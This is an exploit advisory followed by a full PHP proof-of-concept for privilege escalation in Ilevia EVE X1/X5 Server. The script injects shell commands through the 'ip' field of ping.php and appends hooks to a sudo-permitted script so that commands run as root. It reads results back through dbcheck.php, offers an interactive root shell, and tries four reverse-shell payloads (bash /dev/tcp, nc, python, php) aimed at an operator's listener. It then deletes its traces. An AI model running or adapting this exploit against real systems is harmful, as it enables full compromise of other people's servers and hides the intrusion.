=============================================================================================================================================
| # Title : Ilevia EVE X1/X5 Server 4.7.18.0.eden Root Privilege Escalation Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://www.ilevia.com |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211593/ & CVE-2025-34514
[+] Summary : A critical privilege escalation vulnerability exists in Ilevia EVE X1/X5 Server versions ≤ 4.7.18.0.eden
due to an improper sudoers configuration combined with command injection in the web interface (this PoC injects through the `ip` parameter of /ajax/php/ping.php and reads results back through the `db_log` parameter of /ajax/php/dbcheck.php). The chain lets the www-data web user
execute arbitrary commands as root, leading to complete system compromise. Caveat: the companion advisory CVE-2025-34514 is titled an *authenticated* command injection, and this PoC sends no session cookie or credentials — confirm whether ping.php is reachable without a login before describing the full chain as unauthenticated.
[+] POC : * Usage: php ilevia_exploit.php <target_url> [--test | --cmd <command> | --shell <ip:port> | --interactive] (with no option the script runs `sudo -l` as www-data and prints the result)
<?php
/**
* Ilevia EVE X1/X5 Server Privilege Escalation Exploit
* CVE-2025-34515 - by indoushka
*/
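class IleviaExploit {
    /** Script the advisory summary says www-data may run through sudo; it is also writable by www-data, which is the root cause. */
    private const SUDO_SCRIPT = '/home/ilevia/www-config/http/emlite/sync_project.sh';

    /** @var string Base URL of the target, trailing slash removed. */
    private $target_url;
    /** @var resource|\CurlHandle cURL handle reused for every request. */
    private $session;
    /** @var string Transport error of the last failed request(); '' after a successful one. */
    private $last_error = '';

    /**
     * Prepare a reusable cURL session against the target.
     *
     * @param string $target_url Base URL such as http://192.168.1.100:8080 (a trailing slash is stripped).
     */
    public function __construct($target_url) {
        $this->target_url = rtrim($target_url, '/');
        $this->session = curl_init();
        curl_setopt_array($this->session, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_TIMEOUT => 30,
            CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
        ]);
    }

    /**
     * Send one HTTP request and return the raw response body.
     *
     * @param string $path   Path appended to the target URL (starts with '/').
     * @param array  $data   Form fields: urlencoded POST body, or a query string for any other method.
     * @param string $method 'POST' (default) or anything else for GET.
     * @return string|false Response body, or false on a transport failure (timeout, refused
     *                      connection, ...); the reason is then available via lastError().
     */
    private function request($path, $data = [], $method = 'POST') {
        $url = $this->target_url . $path;
        if ($method === 'POST') {
            curl_setopt($this->session, CURLOPT_POST, true);
            curl_setopt($this->session, CURLOPT_POSTFIELDS, http_build_query($data));
        } else {
            curl_setopt($this->session, CURLOPT_POST, false);
            if (!empty($data)) {
                $url .= '?' . http_build_query($data);
            }
        }
        curl_setopt($this->session, CURLOPT_URL, $url);
        $response = curl_exec($this->session);
        // curl_exec() signals transport failures by returning false; keep the reason for the caller.
        $this->last_error = ($response === false) ? curl_error($this->session) : '';
        return $response;
    }

    /**
     * Reason the most recent request() returned false, or '' if it succeeded.
     *
     * @return string
     */
    public function lastError() {
        return $this->last_error;
    }

    /**
     * Wrap a shell script as a value for ping.php's `ip` parameter.
     *
     * The script is carried base64-encoded (alphabet [A-Za-z0-9+/=], no shell metacharacters),
     * decoded on the target inside a nested command substitution and handed to `bash -c`, so
     * quotes, backslashes, `$` and newlines in the script can no longer corrupt the injected
     * fragment. The previous addslashes()-based wrapper depended on several quoting layers
     * agreeing with each other.
     *
     * @param string $script Bash script to run on the target.
     * @return string Command-substitution fragment to place in the `ip` field.
     */
    private function shellPayload($script) {
        return '$(bash -c "$(echo ' . base64_encode($script) . ' | base64 -d)")';
    }

    /**
     * Stage $command in /tmp/exploit.sh and append a hook to sync_project.sh so the command runs
     * with the privileges of whoever executes that script (root, when run through sudo).
     *
     * Side effects on the target: creates /tmp/exploit.sh and appends the lines `id` and
     * `bash /tmp/exploit.sh` to sync_project.sh; cleanup() removes both.
     *
     * @param string $command Command to stage; any characters are safe because it is base64-encoded.
     * @return bool True when ping.php answered '0' (presumably the exit status of the injected
     *              command; inferred from this tool's own expectations, not verified), false otherwise.
     */
    public function injectCommand($command) {
        echo "[*] حقن الأمر في السكريبت...\n";
        $encoded_cmd = base64_encode($command);
        $staging = "echo '#!/bin/bash' > /tmp/exploit.sh && "
            . "echo 'echo " . $encoded_cmd . " | base64 -d | bash' >> /tmp/exploit.sh && "
            . "chmod +x /tmp/exploit.sh && "
            . "echo 'id' >> " . self::SUDO_SCRIPT . " && "
            . "echo 'bash /tmp/exploit.sh' >> " . self::SUDO_SCRIPT;
        $response = $this->request('/ajax/php/ping.php', [
            'ip' => $this->shellPayload($staging),
        ]);
        if ($response !== false && trim($response) === '0') {
            echo "[+] تم حقن الأمر بنجاح\n";
            return true;
        }
        echo "[-] فشل في حقن الأمر\n";
        return false;
    }

    /**
     * Run sync_project.sh through sudo (executing whatever injectCommand() staged), capture its
     * output in /tmp/result.txt and try to read that file back through dbcheck.php.
     *
     * NOTE(review): the tool treats the "error" member of dbcheck.php's JSON response as the
     * requested file's contents; that behaviour is inferred from this usage, not verified here.
     *
     * @return string|false The file contents when dbcheck.php returned them, otherwise the raw
     *                      ping.php response; false when the ping.php request failed.
     */
    public function executePrivileged() {
        echo "[*] تنفيذ السكريبت بصلاحيات الجذر...\n";
        $response = $this->request('/ajax/php/ping.php', [
            'ip' => '$(sudo ' . self::SUDO_SCRIPT . ' > /tmp/result.txt 2>&1 && cat /tmp/result.txt)',
        ]);
        if ($response === false) {
            return false;
        }
        echo "[+] تم التنفيذ بنجاح\n";
        $result = $this->request('/ajax/php/dbcheck.php', [
            'db_log' => '/tmp/result.txt',
        ]);
        if ($result) {
            $data = json_decode($result, true);
            if (is_array($data) && isset($data['error'])) {
                return $data['error'];
            }
        }
        return $response;
    }

    /**
     * Execute $command on the target via `sudo bash` and return its output.
     *
     * A throw-away script is written under /tmp from a base64 blob (so $command may contain
     * quotes, backslashes, `$` or newlines — the old `echo '$command'` wrapper broke on any `'`),
     * run with stdout/stderr captured in /tmp/output.txt, and that file is read back via dbcheck.php.
     *
     * NOTE(review): `sudo bash <script>` only works if www-data's sudoers entry allows it; the
     * advisory summary names sync_project.sh as the permitted target, which is the path
     * injectCommand()/executePrivileged() use — confirm which rule exists on the target.
     *
     * @param string $command Shell command to run as root.
     * @return string|false Command output when dbcheck.php returned a non-empty "error" member;
     *                      otherwise the dbcheck.php body, or failing that the ping.php body;
     *                      false only when both requests failed.
     */
    public function executeCommand($command) {
        echo "[*] إعداد وتنفيذ الأمر: $command\n";
        $temp_script = "/tmp/cmd_" . md5(uniqid()) . ".sh";
        $script = "#!/bin/bash\necho \"Executing as: \$(id)\"\n" . $command . "\n";
        $runner = "echo " . base64_encode($script) . " | base64 -d > $temp_script\n"
            . "chmod +x $temp_script\n"
            . "sudo bash $temp_script > /tmp/output.txt 2>&1\n"
            . "cat /tmp/output.txt";
        $response = $this->request('/ajax/php/ping.php', [
            'ip' => $this->shellPayload($runner),
        ]);
        $output = $this->request('/ajax/php/dbcheck.php', [
            'db_log' => '/tmp/output.txt',
        ]);
        if ($output) {
            $data = json_decode($output, true);
            if (is_array($data) && isset($data['error']) && trim((string) $data['error']) !== '') {
                return $data['error'];
            }
        }
        return $output ?: $response;
    }

    /**
     * Try four reverse-shell one-liners in turn, each through executeCommand().
     *
     * NOTE(review): the loop stops at the first executeCommand() result that is not false, which
     * only proves the HTTP request round-tripped — it does not confirm that anything connected
     * back to $lhost:$lport. The one-liners also run synchronously inside the injected command
     * substitution, so a connected shell will most likely hold the request open until it exits
     * or cURL's 30 s timeout fires.
     *
     * @param string     $lhost Listener address.
     * @param string|int $lport Listener port.
     * @return bool True when one payload was sent and answered, false when all attempts failed.
     */
    public function reverseShell($lhost, $lport) {
        echo "[*] محاولة الحصول على shell عكسي على $lhost:$lport\n";
        $payloads = [
            // bash reverse shell
            "bash -i >& /dev/tcp/$lhost/$lport 0>&1",
            // nc reverse shell
            "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc $lhost $lport >/tmp/f",
            // python reverse shell
            "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"$lhost\",$lport));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'",
            // php reverse shell
            "php -r '\$sock=fsockopen(\"$lhost\",$lport);exec(\"/bin/bash <&3 >&3 2>&3\");'",
        ];
        foreach ($payloads as $i => $payload) {
            echo "[*] محاولة payload #" . ($i + 1) . "\n";
            $result = $this->executeCommand($payload);
            if ($result !== false) {
                echo "[+] تم إرسال payload بنجاح\n";
                echo "[i] استمع على: nc -lvnp $lport\n";
                return true;
            }
            sleep(2);
        }
        echo "[-] فشل جميع محاولات reverse shell\n";
        return false;
    }

    /**
     * Check that ping.php is reachable and behaves as expected.
     *
     * Pings 127.0.0.1 and expects the body '0' (presumably the ping exit status). cURL reports
     * failures by returning false rather than throwing, so the transport error is printed here
     * instead of being caught as an exception.
     *
     * @return bool
     */
    public function testConnection() {
        echo "[*] اختبار الاتصال بالهدف...\n";
        $response = $this->request('/ajax/php/ping.php', [
            'ip' => '127.0.0.1',
        ]);
        if ($response !== false && trim($response) === '0') {
            echo "[+] الهدف متاح ويستجيب\n";
            return true;
        }
        if ($this->last_error !== '') {
            echo "[-] خطأ في الاتصال: " . $this->last_error . "\n";
        }
        return false;
    }

    /**
     * Best-effort removal of the artefacts this tool leaves on the target: the /tmp files and the
     * two lines appended to sync_project.sh. The request's outcome is not checked.
     *
     * @return void
     */
    public function cleanup() {
        echo "[*] تنظيف الآثار...\n";
        $cleanup_cmd = "rm -f /tmp/exploit.sh /tmp/result.txt /tmp/output.txt /tmp/cmd_*.sh; "
            . "sed -i '/^id$/d' " . self::SUDO_SCRIPT . "; "
            . "sed -i '/^bash \\/tmp\\/exploit\\.sh$/d' " . self::SUDO_SCRIPT;
        $this->request('/ajax/php/ping.php', [
            'ip' => $this->shellPayload($cleanup_cmd),
        ]);
        echo "[+] تم التنظيف\n";
    }

    /** Release the cURL handle. */
    public function __destruct() {
        curl_close($this->session);
    }
}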
// واجهة سطر الأوامر
/**
 * Print the tool banner (title and CVE reference) followed by a blank line.
 *
 * @return void
 */
function printBanner() {
    $lines = [
        '=============================================',
        ' Ilevia EVE X1/X5 Privilege Escalation Exploit',
        ' CVE-2025-34515 - by indoushka ',
        '=============================================',
        '',
    ];
    echo implode("\n", $lines), "\n";
}
/**
 * Print the command-line usage text (options and examples) to stdout.
 *
 * @return void
 */
function printUsage() {
    $self = basename(__FILE__);
    $text = "الاستخدام:\n"
        . " php " . $self . " <url> [options]\n\n"
        . "الخيارات:\n"
        . " --test اختبار الاتصال فقط\n"
        . " --cmd <command> تنفيذ أمر واحد\n"
        . " --shell <ip:port> الحصول على reverse shell\n"
        . " --interactive وضع تفاعلي\n\n"
        . "أمثلة:\n"
        . " php ilevia_exploit.php http://192.168.1.100:8080 --test\n"
        . " php ilevia_exploit.php http://target.com --cmd \"cat /etc/passwd\"\n"
        . " php ilevia_exploit.php http://target.com --shell 192.168.1.50:4444\n";
    echo $text;
}
// التنفيذ الرئيسي
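if (php_sapi_name() !== 'cli') {
    die("هذا الاستغلال يعمل فقط من سطر الأوامر (CLI)\n");
}
// --help / -h is answered before any target is contacted (the usage text promises --help).
if ($argc < 2 || in_array($argv[1], ['--help', '-h'], true)) {
    printBanner();
    printUsage();
    exit($argc < 2 ? 1 : 0);
}
$target = $argv[1];
$option = $argv[2] ?? null;
$exploit = new IleviaExploit($target);
printBanner();
// Every mode depends on ping.php answering; stop early if it does not.
if (!$exploit->testConnection()) {
    echo "[-] الهدف غير متاح\n";
    exit(1);
}
if ($option === null) {
    // Default mode: show what www-data may run through sudo (the escalation prerequisite).
    echo "[*] جلب صلاحيات sudo للمستخدم www-data...\n";
    $result = $exploit->executeCommand("sudo -l");
    if ($result !== false) {
        echo "\n[+] صلاحيات sudo:\n";
        echo "================================\n";
        echo $result . "\n";
        echo "================================\n";
    }
    echo "\n[i] للمزيد من الخيارات، استخدم --help\n";
} else {
    switch ($option) {
        case '--test':
            echo "[+] اختبار الاتصال ناجح\n";
            exit(0);
        case '--cmd':
            // A missing command used to fall through silently; report it as a usage error.
            if ($argc < 4) {
                printUsage();
                exit(1);
            }
            $command = $argv[3];
            echo "[*] تنفيذ الأمر: $command\n";
            $result = $exploit->executeCommand($command);
            if ($result !== false) {
                echo "\n[+] النتيجة:\n";
                echo "================================\n";
                echo $result . "\n";
                echo "================================\n";
            } else {
                echo "[-] فشل التنفيذ\n";
            }
            break;
        case '--shell':
            // Require host:port with a numeric port; a bare explode() left $lport undefined
            // when the argument had no colon.
            $parts = $argc >= 4 ? explode(':', $argv[3], 2) : [];
            if (count($parts) !== 2 || $parts[0] === '' || !ctype_digit($parts[1])) {
                echo "[-] --shell expects <ip:port>\n";
                printUsage();
                exit(1);
            }
            [$lhost, $lport] = $parts;
            $exploit->reverseShell($lhost, $lport);
            break;
        case '--interactive':
            echo "[*] الانتقال للوضع التفاعلي\n";
            echo "[i] اكتب 'exit' للخروج أو 'clean' للتنظيف\n\n";
            while (true) {
                echo "ilevia> ";
                $line = fgets(STDIN);
                if ($line === false) {
                    // EOF (Ctrl-D or a closed pipe): the old loop spun forever here because
                    // trim(false) === '' was treated as an empty command.
                    echo "\n";
                    break;
                }
                $command = trim($line);
                if ($command === 'exit') {
                    break;
                }
                if ($command === 'clean') {
                    $exploit->cleanup();
                    continue;
                }
                if ($command === '') {
                    continue;
                }
                $result = $exploit->executeCommand($command);
                if ($result !== false) {
                    echo "\n" . $result . "\n\n";
                } else {
                    echo "[-] فشل التنفيذ\n";
                }
            }
            break;
        case '--help':
            printUsage();
            exit(0);
        default:
            printUsage();
            exit(1);
    }
}
// Best-effort removal of the files and script lines this run may have left on the target.
$exploit->cleanup();
echo "\n[+] انتهى التنفيذ\n";
?>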
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================